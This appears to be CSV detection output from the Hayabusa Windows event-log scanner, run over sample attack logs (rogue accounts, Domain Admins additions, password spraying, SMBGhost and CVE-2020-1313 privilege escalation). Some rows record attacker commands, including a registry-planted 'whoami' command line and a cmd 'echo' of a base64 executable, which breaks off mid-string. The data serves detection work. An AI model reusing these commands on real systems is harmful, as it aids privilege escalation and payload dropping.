2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Local Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx
2020-07-27 07:26:14.522 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
2020-08-02 07:58:09.443 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQALVO2SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAADmNAAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA